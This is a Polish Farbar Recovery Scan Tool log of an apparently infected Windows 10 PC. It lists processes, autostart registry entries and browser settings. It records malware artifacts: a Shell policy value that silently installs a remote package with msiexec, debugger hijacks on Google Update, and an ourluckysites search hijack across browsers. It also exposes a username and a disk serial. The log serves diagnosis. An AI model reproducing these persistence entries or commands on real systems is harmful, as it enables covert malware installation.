Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 15-06-2017 01 Uruchomiony przez Cepek (administrator) CEPEK (16-06-2017 16:00:54) Uruchomiony z C:\Users\Cepek\Desktop Załadowane profile: Cepek (Dostępne profile: Cepek & DefaultAppPool) Platform: Windows 10 Home Wersja 1607 (X64) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Eggper\Application\chrome.exe" "%1") Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (Intel Corporation) C:\Windows\System32\igfxCUIService.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe (Hola Networks Ltd.) C:\Program Files\Hola\app\hola_svc.exe (Hola Networks Ltd.) C:\Program Files\Hola\app\hola_updater.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe () C:\ProgramData\MobileBrServ\mbbService.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe (Micro-Star International Co., Ltd.) C:\Program Files (x86)\S-Bar\MSIService.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Windows\System32\mqsvc.exe (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe (Visicom Media Inc.) C:\Program Files\Panda Security URL Filtering\Panda_URL_Filteringb.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe (Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Condusiv Technologies) C:\Program Files\Condusiv Technologies\Diskeeper\DkService.exe () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe (Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel Corporation) C:\Windows\System32\igfxTray.exe (ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Hola Networks Ltd.) C:\Program Files\Hola\app\hola.exe (Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Innovative Digital Technologies) C:\Users\Cepek\AppData\Roaming\ACEStream\engine\ace_engine.exe (AVAST Software) C:\Users\Cepek\AppData\Local\background_fault\aswRD.exe (Nico Mak Computing) C:\Program Files\WinZip\FAHWindow64.exe (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe (Innovative Digital Technologies) C:\Users\Cepek\AppData\Roaming\ACEStream\engine\ace_engine.exe () C:\Users\Cepek\AppData\Roaming\ACEStream\updater\ace_update.exe (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera_crashreporter.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe () C:\Program Files (x86)\Origin\QtWebEngineProcess.exe () C:\Program Files (x86)\Origin\QtWebEngineProcess.exe (Electronic Arts) C:\Program Files (x86)\Origin Games\FIFA 17\FIFASetup\fifaconfig.exe (Electronic Arts) C:\Program Files (x86)\Origin Games\FIFA 17\FIFA17.exe (Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Opera Software) C:\Program Files (x86)\Opera\45.0.2552.888\opera.exe (Microsoft Corporation) C:\Windows\System32\smartscreen.exe ==================== Rejestr (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [3366624 2016-09-18] (ELAN Microelectronics Corp.) HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-27] (Realtek Semiconductor) HKLM\...\Run: [BLEServicesCtrl] => C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe [184632 2013-10-18] (Motorola Solutions, Inc.) HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart HKLM\...\Run: [hola] => C:\Program Files\Hola\app\hola.exe [2168416 2017-02-22] (Hola Networks Ltd.) <===== UWAGA HKLM\...\Run: [WindowsDefender] => C:\Program Files\Windows Defender\MSASCuiL.exe [631808 2017-04-28] (Microsoft Corporation) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation) HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe [141760 2017-02-22] (Panda Security, S.L.) HKLM\...\Winlogon: [Userinit] C:\WINDOWS\SysWOW64\userinit.exe, HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [MyDriveConnect.exe] => C:\Program Files (x86)\MyDrive Connect\TomTom MyDrive Connect.exe [1906088 2017-01-17] (TomTom) HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [GoogleChromeAutoLaunch_0138111595B56A945BC28A909B9620F5] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [856904 2014-12-06] (Google Inc.) HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9363672 2017-02-08] (Piriform Ltd) HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [GG] => C:\Users\Cepek\AppData\Local\GG\Application\gghub.exe [4078144 2016-04-18] (GG Network S.A.) HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [ScreenShooter] => C:\Program Files\ScreenShooter5\ScreenShooter5.exe [967680 2015-09-18] () HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [AceStream] => C:\Users\Cepek\AppData\Roaming\ACEStream\engine\ace_engine.exe [28024 2017-03-20] (Innovative Digital Technologies) HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Run: [background_fault] => C:\Users\Cepek\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) <===== UWAGA HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88MWYcFTEcRWE2FUM2FUJWFUY2RTUxMUJYMkY8RjMxOH== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [GGDriveOverlay1] -> {E68D0A50-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2013-01-17] (GG Network S.A.) ShellIconOverlayIdentifiers: [GGDriveOverlay2] -> {E68D0A51-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2013-01-17] (GG Network S.A.) ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2013-01-17] (GG Network S.A.) ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2013-01-17] (GG Network S.A.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FAH.lnk [2016-12-28] ShortcutTarget: FAH.lnk -> C:\Program Files\WinZip\FAHConsole.exe (Nico Mak Computing) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Update Notifier.lnk [2016-12-28] ShortcutTarget: Update Notifier.lnk -> C:\Program Files\WinZip\WZUpdateNotifier.exe (Nico Mak Computing) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinZip Preloader.lnk [2016-12-28] ShortcutTarget: WinZip Preloader.lnk -> C:\Program Files\WinZip\WzPreloader.exe (WinZip Computing, S.L.) Startup: C:\Users\Cepek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-12-28] ShortcutTarget: Dropbox.lnk -> C:\Users\Cepek\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{04e7467a-bb05-4d3b-8f26-98c08e5c52fe}: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{37e2cb1d-5a8e-4f00-ba54-fe3a89355dcc}: [DhcpNameServer] 192.168.1.1 192.168.1.1 Tcpip\..\Interfaces\{4a644851-20e2-4b98-8916-5ea326898a41}: [DhcpNameServer] 192.168.1.1 192.168.1.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} HKU\S-1-5-21-1368180626-1709571630-246340318-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493740855&z=a5ff9fcf3ada1c1a3264e3eg4z7tfc7m1z5efbfw4q&from=ypid&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-1368180626-1709571630-246340318-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} SearchScopes: HKU\S-1-5-21-1368180626-1709571630-246340318-1000 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-1368180626-1709571630-246340318-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495445351&z=7264061864cc7631a9d5bfdg0zat3w6zbz1w3c3w0w&from=che0812&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553&q={searchTerms} SearchScopes: HKU\S-1-5-21-1368180626-1709571630-246340318-1000 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = SearchScopes: HKU\S-1-5-21-1368180626-1709571630-246340318-1000 -> {55348B64-C806-40C8-B4BD-5EA33358A68D} URL = hxxp://www.google.com/search?hl=pl&q={searchTerms} BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-04-11] (Microsoft Corporation) BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-03-26] (Oracle Corporation) BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems Incorporated) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation) BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-03-26] (Oracle Corporation) BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems Incorporated) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2017-04-11] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-12-28] (Oracle Corporation) BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems Incorporated) BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-12-28] (Oracle Corporation) BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems Incorporated) Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll [2014-05-08] (Adobe Systems Incorporated) Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll [2014-05-08] (Adobe Systems Incorporated) Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2016-05-17] (Microsoft Corporation) StartMenuInternet: IEXPLORE.EXE - iexplore.exe Edge: ====== Edge HomeButtonPage: HKU\S-1-5-21-1368180626-1709571630-246340318-1000 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493740855&z=a5ff9fcf3ada1c1a3264e3eg4z7tfc7m1z5efbfw4q&from=ypid&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553 FireFox: ======== FF ProfilePath: C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default [2017-06-02] FF NewTab: Mozilla\Firefox\Profiles\wzdqzqxi.default -> about:newtab FF DefaultSearchEngine: Mozilla\Firefox\Profiles\wzdqzqxi.default -> ourluckysites FF DefaultSearchUrl: Mozilla\Firefox\Profiles\wzdqzqxi.default -> hxxps://search.avast.com/AV772/search/web?q={searchTerms} FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\wzdqzqxi.default -> Avast Search FF SelectedSearchEngine: Mozilla\Firefox\Profiles\wzdqzqxi.default -> ourluckysites FF Homepage: Mozilla\Firefox\Profiles\wzdqzqxi.default -> hxxp://www.ourluckysites.com/?type=hp&ts=1493740855&z=a5ff9fcf3ada1c1a3264e3eg4z7tfc7m1z5efbfw4q&from=ypid&uid=WDCXWD7500BPVT-22HXZT3_WD-WX41A233655336553 FF Keyword.URL: Mozilla\Firefox\Profiles\wzdqzqxi.default -> hxxps://search.avast.com/AV772/search/web?q={searchTerms} FF Extension: (Proxmate) - C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default\Extensions\jid1-QpHD8URtZWJC2A@jetpack.xpi [2016-06-10] FF Extension: (Panda Security Toolbar) - C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default\Extensions\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}.xpi [2016-04-26] FF Extension: (Video DownloadHelper) - C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-08-23] FF Extension: (Adblock Plus) - C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-10] FF Extension: (Brak nazwy) - C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default\extensions\avg@toolbar.xpi [nie znaleziono] FF SearchPlugin: C:\Users\Cepek\AppData\Roaming\Mozilla\Firefox\Profiles\wzdqzqxi.default\searchplugins\ourluckysites.xml [2017-05-31] FF ProfilePath: C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default [2017-05-31] FF NewTab: Firefox\Firefox\Profiles\wzdqzqxi.default -> about:newtab FF DefaultSearchUrl: Firefox\Firefox\Profiles\wzdqzqxi.default -> hxxps://search.avast.com/AV772/search/web?q={searchTerms} FF SearchEngineOrder.1: Firefox\Firefox\Profiles\wzdqzqxi.default -> Avast Search FF Keyword.URL: Firefox\Firefox\Profiles\wzdqzqxi.default -> hxxps://search.avast.com/AV772/search/web?q={searchTerms} FF Extension: (FF Adr) - C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-05-03] [Brak podpisu cyfrowego] FF Extension: (Proxmate) - C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\Extensions\jid1-QpHD8URtZWJC2A@jetpack.xpi [2016-06-10] FF Extension: (Polski Language Pack) - C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-31] [Brak podpisu cyfrowego] FF Extension: (Panda Security Toolbar) - C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\Extensions\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}.xpi [2016-04-26] FF Extension: (Video DownloadHelper) - C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-08-23] FF Extension: (Adblock Plus) - C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-06-10] FF SearchPlugin: C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\searchplugins\ourluckysites.xml [2017-05-02] FF SearchPlugin: C:\Users\Cepek\AppData\Roaming\Firefox\Firefox\Profiles\wzdqzqxi.default\searchplugins\startsearch.xml [2017-05-31] FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCFirefoxExtn [2014-07-21] [Brak podpisu cyfrowego] FF HKU\S-1-5-21-1368180626-1709571630-246340318-1000\...\Firefox\Extensions: [acewebextension_unlisted@acestream.org] - C:\Users\Cepek\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi FF Extension: (Ace Stream Web Extension) - C:\Users\Cepek\AppData\Roaming\ACEStream\extensions\awe\firefox\acewebextension_unlisted.xpi [2017-01-31] FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\ourluckysites.xml [2017-05-31] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_21_0_0_213.dll [2016-05-12] () FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-03-26] (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-03-26] (Oracle Corporation) FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll [2016-05-12] () FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\40.3.7\\npsitesafety.dll [Brak pliku] FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-01-06] (Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-01-06] (Intel Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-12-28] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-12-28] (Oracle Corporation) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll [2014-11-13] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll [2014-11-13] (Google Inc.) FF Plugin-x32: @unity3d.com/UnityPlayer,version=1.0 -> C:\Program Files (x86)\Unity\WebPlayer\loader\npUnity3D32.dll [2014-12-05] (Unity Technologies ApS) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll [2014-05-08] (Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems) FF Plugin HKU\S-1-5-21-1368180626-1709571630-246340318-1000: @acestream.net/acestreamplugin,version=3.1.11 -> C:\Users\Cepek\AppData\Roaming\ACEStream\player\npace_plugin.dll [2017-01-31] (Innovative Digital Technologies) FF Plugin HKU\S-1-5-21-1368180626-1709571630-246340318-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Cepek\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [Brak pliku] FF Plugin HKU\S-1-5-21-1368180626-1709571630-246340318-1000: electronicarts.com/GameFacePlugin -> C:\Users\Cepek\AppData\Roaming\Electronic Arts\Game Face\npGameFacePlugin.dll [2012-12-20] (Electronic Arts) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-07-19] (Microsoft Corporation) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.) 